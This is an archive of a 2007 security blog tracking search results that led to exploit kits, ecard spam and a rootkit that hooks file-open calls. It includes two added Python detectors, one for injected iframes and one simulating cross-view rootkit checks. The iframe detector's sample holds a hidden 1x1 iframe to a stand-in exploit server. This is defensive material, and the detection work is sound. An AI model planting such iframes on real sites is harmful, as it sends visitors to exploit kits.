Wednesday, June 27, 2007

Dangerous searches - June 27, 2007

Hi folks,

It's been a few days, and I thought I'd post the highlights. Over the last few days, it's been dangerous to search for such diverse things as ...

"music without voice" - WebAttacker2/MPack

"famous cubists" - WebAttacker/ MPack

"what is the regulation height of a dartboard" - believe it or not, this can get you a fake codec. Is nothing sacred?

"travel line buses sheffield" - MDAC

"polly pocket" - MDAC - no, nothing is sacred

"florida baptist churches" - nope, nothing.

"blank paper invitation pockets" - WebAttacker2/MPack

"web counter that works on myspace" - MDAC

and we don't usually care about p0rno queries, but this one is too funny to ignore...

"looney toon porn" .... whatever!

Cheers

Roger

Saturday, June 23, 2007

Dangerous searches - June 23, 2007

Hi folks,

The overall state of play is that there are still two significant attack waves happening. The ecard guys out of the .hk domains have cleaned up their English and prettied up their email a bit. It's now downloading 2MB of something. We're not sure what it is at this point, but it's probably not friendly, and there are still lots of compromised Italian sites launching MPack/WebAttacker2.

Here are some of the more interesting (and unexpected) dangerous search terms from the last couple of days...

"Firefox" ... ! Fortunately, that's only dangerous if you're using Internet Explorer to search for it.

"watch movies for free" ... wrong selection gets you a WebAttacker2/MPack.

"wallpaper" ... webattacker2/mpack

"blue book" ... is still dangerous. That's been about a week now, which is unusual. Most of these get cleaned up quite quickly.

"stem cell research"... that's a bit mean

"bulgarian mp3 music download" ... that's too easy (JUST KIDDING!)

and "radio blogs" ... wrong choice gets an MDAC.

Cheers

Roger

Wednesday, June 20, 2007

Dangerous searches - June 20, 2007

Hi folks,

I'd stopped tracking this stuff because I thought no one cared, but emails I've had off-list have convinced me otherwise. I think it's _really_ interesting to see what innocent searches can get you into trouble, and we're happy to share. I've also had the question off-list "Does this mean you track all your user's queries?" to which the answer is "Heck no!", but we do track the queries that result in exploit attempts. This is what we _do_. We couldn't care less who _you_ are and what queries _you_ make, but we sure want to know who tries to bite you! This is our job!

Here are the most interesting dangerous searches for the last few days...

"go karts" - wrong selection gets an MDAC exploit

almost any national park in the southwest is still dangerous, rattlesnakes notwithstanding

"texas tea slots online" - wrong selection gets an MDAC

"insurance australia" - clearly that's dangerous ;-) ... the wrong result looks to be just an Orphaned Lure, but you can never be sure about Orphans.

"cannot find server" - clearly _that's_ dangerous! ... wrong selection gets a WebAttacker/ Mpack.

"top wallpapers" gets an MDAC

"free lottery" gets an Orphaned Lure

As someone famous once said "There's a million of them"

Of course, there are also _lots_ of Italian references which we don't understand, but which are hitting WebAttacker/ Mpacks.

Cheers

Roger

Monday, June 18, 2007

Two pretty good attack waves

Hi folks,

At the moment, it appears there are two determined but separate waves of attack underway. One involves a large number of hacked websites, seemingly in Italy, which are iframed and reaching back to an MPack/WebAttacker exploit server (or servers), and the second is the continuing wave of alleged greeting cards, mostly from .hk domains. This second one is the one we blogged about over the weekend that uses an ANI exploit together with a circa-2005 exploit... sort of a sublime and a ridiculous thing simultaneously.

Of course, LinkScanner detects it all just fine.
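The injected-iframe pattern described above (a compromised site carrying a frame that pulls the visitor to an exploit server) can be checked for statically. The following is an added example, not LinkScanner code and not from the original post: it uses only the Python standard library, and the HTML sample, the site name www.example.it and the TEST-NET address 203.0.113.10 are constructed for illustration.

```python
"""Flag injected iframes of the kind used to pull visitors to an exploit kit.

Added example (not LinkScanner code, not from the blog). Standard library only,
with a constructed HTML sample so it runs offline.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _pixels(value):
    """Parse a width/height attribute; None if it is not a plain pixel count."""
    if value is None:
        return None
    value = value.strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdigit() else None


class IframeAuditor(HTMLParser):
    """Collect iframes that look injected: third-party, tiny, or hidden."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        reasons = []

        # Frame sourced from a host other than the page being served.
        host = (urlparse(src).hostname or "").lower()
        if host and host != self.page_host:
            reasons.append("third-party src")

        # 0x0 and 1x1 frames have no legitimate reason to exist.
        w, h = _pixels(a.get("width")), _pixels(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("tiny frame")

        # Hidden or pushed off-screen via inline style.
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via style")
        if "position:absolute" in style and ("left:-" in style or "top:-" in style):
            reasons.append("positioned off-screen")

        # A same-origin, visible, full-size iframe is ordinary; only record flagged ones.
        if reasons:
            self.findings.append((src, reasons))


def audit_page(html, page_host):
    """Return [(src, reasons)] for every suspicious iframe in the page."""
    auditor = IframeAuditor(page_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: a legitimate site with one injected frame appended after
# </html>, which is where an automated mass-compromise typically tacks it on.
SAMPLE_HTML = """<html><body>
<h1>Ristorante Da Mario</h1>
<iframe src="http://www.example.it/menu.html" width="600" height="400"></iframe>
</body></html>
<iframe src=http://203.0.113.10/index.php width=1 height=1 style="visibility:hidden;border:0"></iframe>
"""

if __name__ == "__main__":
    for src, why in audit_page(SAMPLE_HTML, "www.example.it"):
        print(f"suspicious iframe -> {src}: {', '.join(why)}")
```

This only sees iframes that are literally in the HTML. Kits of this generation also wrote the frame from obfuscated script (document.write over an unescaped string), which a static pass like this will not see; that case needs the page rendered, or the script decoded, before the same checks are applied.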

Cheers

Roger


Saturday, June 16, 2007

New attack underway

Hi folks,

There is a significant attack run underway over the weekend. It involves a spam run telling people they have a Greeting Card, not that this is a new tactic, but it involves a seemingly large number of .hk domains. If you click the link to view the card, it throws an ANI exploit, which is new-ish (patched in April 2007), and MS06-042, which is old-ish (patched in October 2006), and an MS05-052!!! I have no idea when that was patched except that it was 2005 sometime, and if someone has not patched since then... well... they have a name for people like that... serially pwned.

If it manages to nail you, it installs a downloader for which AV detection is low, and it, in turn, downloads a rootkit for which AV detection is _very_ low.

The weird thing in all this is the use of a two-year-old exploit that we have not seen in use anywhere else until now. Go figure.

If you're patched, or are running LinkScanner, all is well.

Cheers

Roger

Thursday, June 14, 2007

Dangerous searches June 14th 2007

Hi folks,

Today it's dangerous to search for

atlas mountains country ... (wrong result gets you a WebAttacker 2 or MPack)

rotweiller rescue

North Padre Island (WebAttacker 2 or Mpack)

arches national park (WebAttacker 2 or MPack)

canyonlands national park (in fact, lots of National Parks in that part of the world ... the Badlands can still be dangerous)

and the mass lottery

Keep safe

Roger


Wednesday, June 13, 2007

Dangerous searches

Hi folks,

Today it's dangerous to search for

air disasters in Florida (wrong answer will get you a WebAttacker 2)

cd key windows xp profesional (that's another 'duh!')

and

batmobile for sale (does that need a comment?)

Mostly, it's a quiet day folks. Works for us.

:-)

Roger

Tuesday, June 12, 2007

Dangerous searches

Hi folks,

Today it's dangerous to search for ...

victoria's secret (duh! the wrong website here gets you a fake codec)

pokemon ruby gamesharks (I couldn't make this stuff up)

blue book (wrong website gets you an mdac exploit)

bulletin boards in norwich, ct (that'll get you an Orphaned Lure which might not be an orphan)

and .... music! (webattacker 2 or mpack)

:-)

Cheers

Roger


Monday, June 11, 2007

Dangerous searches

Hi folks,

Today it's dangerous to search for IBM stock, pallet fire (what's that???), Nigerian economic and financial crimes (there's a shock), and/or to find out who's a rat.

It's left as an exercise to the Attentive Reader (tm) to find the exploitive websites. Anyone running the SearchShield function of LinkScanner should find it easy.

:-)

Cheers

Roger


A cunning rootkit

Ok, I see what they're doing now.

First some background ... Most rootkits _hide_ themselves from the Windows API, and the anti-rootkits _find_ them by looking first with the normal Windows API, then making another pass of the disk making calls directly to the kernel, and then comparing the lists. If they find a file in the second list that's not in the first, they report it as hidden, and there's a good chance it's a rootkit. This method is far from foolproof, because, for example, files might be legitimately created, say by a browser, in between passes, and they will look like hidden files, but it's good enough to provide a clue anyway.

What's happening with this one is that it is _not_ hidden. It sits in plain sight, and when the cross-viewing anti-rootkits compare their lists, they get no differences, and therefore no hidden files, and most declare there to be no rootkit on the system.

Why is it a rootkit then? Instead of hooking the file list functions, they're hooking the _file open_ functions. If you try to view, or scan, or copy the contents of the rootkit, you get a "file does not exist" error!!! What this means is that even if your scanner has a signature for that rootkit, it probably won't be able to open the file anyway.

I dunno about you but I think that's pretty cunning!
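The two checks the post contrasts, cross-view enumeration and what it misses, are small enough to write out. The following is an added example, not the blog's own code and not any anti-rootkit product's: the disk, the hooked Windows API and the raw kernel pass are in-memory stand-ins (on a real system the three methods of FakeVolume would wrap FindFirstFile/CreateFile and a raw NTFS walk), and the driver names hiddenrk.sys and plainsight.sys are hypothetical. It also handles the two false positives a practitioner hits: a file created between passes, and a file deleted between listing and open.

```python
"""Cross-view rootkit detection plus an "open probe" for rootkits that hook
file open rather than file enumeration.

Added example, not the blog's code. FakeVolume is a constructed stand-in for a
disk with a rootkit's hooks in place, so everything runs offline.
"""
import errno
from dataclasses import dataclass, field


@dataclass
class FakeVolume:
    """Constructed stand-in for a disk plus the rootkit's hooks."""
    files: set
    filtered_from_listing: set = field(default_factory=set)  # classic rootkit: dropped from enumeration
    refused_on_open: set = field(default_factory=set)        # the 'cunning' variant: open() fails
    appear_mid_scan: list = field(default_factory=list)      # legitimate files created during the scan

    def api_listing(self):
        """What the (hooked) Windows API enumeration reports."""
        return {f for f in self.files if f not in self.filtered_from_listing}

    def kernel_listing(self):
        """Raw pass that bypasses the user-mode hooks. Also emulates a browser
        writing a cache file while the scan is in progress."""
        if self.appear_mid_scan:
            self.files.add(self.appear_mid_scan.pop())
        return set(self.files)

    def api_open(self, path):
        """CreateFile through the hooked open path."""
        if path not in self.files or path in self.refused_on_open:
            raise FileNotFoundError(errno.ENOENT, "file does not exist", path)
        return True


def cross_view_scan(vol):
    """Classic cross-view: kernel-visible but API-invisible means hidden.
    A second API pass after the raw pass discounts files that merely appeared
    between the two listings, the false positive the post describes."""
    first = vol.api_listing()
    raw = vol.kernel_listing()
    second = vol.api_listing()
    hidden = raw - first - second
    transient = (raw - first) & second
    return sorted(hidden), sorted(transient)


def open_probe(vol):
    """The check a cross-view cannot make: a file the API enumerates but then
    claims does not exist when opened. A file legitimately deleted in the
    meantime would have left the listing too, so it is re-listed before flagging."""
    suspicious = []
    for path in sorted(vol.api_listing()):
        try:
            vol.api_open(path)
        except FileNotFoundError as exc:
            if exc.errno == errno.ENOENT and path in vol.api_listing():
                suspicious.append(path)
    return suspicious


def build_sample():
    """Constructed disk: one enumeration-hiding rootkit, one open-hooking
    rootkit sitting in plain sight, and a cache file that appears mid-scan."""
    return FakeVolume(
        files={
            r"C:\Windows\System32\kernel32.dll",
            r"C:\Windows\System32\drivers\hiddenrk.sys",
            r"C:\Windows\System32\drivers\plainsight.sys",
        },
        filtered_from_listing={r"C:\Windows\System32\drivers\hiddenrk.sys"},
        refused_on_open={r"C:\Windows\System32\drivers\plainsight.sys"},
        appear_mid_scan=[r"C:\Temp\browsercache.tmp"],
    )


def run_scan(vol):
    """Run both checks and return their findings by category."""
    hidden, transient = cross_view_scan(vol)
    return {"hidden": hidden, "transient": transient, "unopenable": open_probe(vol)}


if __name__ == "__main__":
    for kind, paths in run_scan(build_sample()).items():
        print(f"{kind:>10}: {paths}")
```

The cross-view alone reports hiddenrk.sys and nothing else; plainsight.sys only shows up in the open probe, which is the gap the post is pointing at. A scanner that has a signature for the file but never gets past the open call is in exactly that position.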

Cheers

Roger

Sunday, June 10, 2007

They swapped it out

That's interesting .... the St Petersburg Iframers have swapped out the new rootkit for something old and mouldy that everyone can detect!

One wonders when the new one will come back.

Cheers

Roger

Yahoo exploit In The Wild

Hi folks,

Recently a couple of exploits were announced for Yahoo Messenger Webcam DLLs, and today there are websites actively using them to install malcode. We don't expect this to be an important or widespread outbreak, but we do expect it to be adopted by the rest of the malicious webmeisters over the next few weeks.

Naturally, we've added detection for it to LinkScanner.

Cheers

Roger

Saturday, June 09, 2007

Keep those rootkits out

Hi folks,

The St Petersburg iframers have a new rootkit. None of the scanners that I have access to can put a name to it so far, and none of the generic cross-viewers that I have can see it, with the exception of GMER, and GMER isn't sure about it.

That these guys would have something new and difficult is not really surprising... they were using Rustock variants for a long time, which gave most anti-virus/anti-spyware products a hard time by storing themselves in an Alternate Data Stream and then hiding the ADS, but lots of AV/AS products can now see in the ADS. It's reasonable to assume they'd move to something newer.

Somewhat amusingly, they're still using the same exploits to plant it, so if you're patched and/or running LinkScanner, you have nothing to fear, but if you're not ... you don't want to get this one on your system.

Trust me ... it's better to keep them out than to try to remove them once they're in!

Cheers

Roger


Thursday, June 07, 2007

At least they're honest about ripping you off...

Hi folks,

One of our users brought this to our attention. A bunch of websites are offering free web-counters. -start channeling Homer- Free? How could I go wrong? I'd have to be an idiot to pass that up. - end channeling Homer-

Well, if you read the Terms and Conditions, it contains this gem...

"Possible uses includes (but to are not limited to)
to directory of the sites using our service, the purpose situated
scripts inserted in your web can be used by us for every of profit,
general promotional uses, any purpose of profit, activx, pay Internet,
Dialer, Premium Number, redirect, etc."

Disregarding the poor English, at least they're telling you what they plan to do to you and your customers!

Read those EULAs folks!.

Cheers

Roger

Wednesday, June 06, 2007

You've got to like it ...

when you find the Bad Guys' development sites. :-)

In the last three days, our researchers have found two such sites. We've already added sigs for their efforts. :-)

Seriously though, I'm fairly confident that we're going through a quiet period, where the various groups are re-organizing themselves. Some good exploits have surfaced in the last couple of days, and some of them will find their way to websites in the next few weeks.

We'll be watching, and will keep you posted.

Cheers

Roger

Saturday, June 02, 2007

Exploit-y news

Hi folks,

There are two developments worth mentioning.

First is that we are detecting increased usage of MS07-027. (MS07-027 patched several vulnerabilities, but the one we're seeing in use involves a DLL called MDSAUTH which apparently allows arbitrary file writing.) The critical thing about this is that it was only patched on May 8th; however, the proof of concept code was released and available almost immediately, and it is certainly being used by the Chinese gangs. These guys have a habit of hacking large numbers of innocent websites and turning them into unwitting lures.

The second is that we are seeing _lots_ of activity involving the MPack exploit package (what we used to call WebAttacker 2). There are clearly large numbers of hacked websites involved here, and the exploit code works really well. This is the package that we've talked about before, and which contains lots of different exploits. The most dangerous are probably WinZip, because there is no automatic upgrade path for WinZip, and many people will still be using a vulnerable version, and the April 2007 animated cursor exploit, simply because it's so new. Many corporates will not be patched to April.

Cheers

Roger
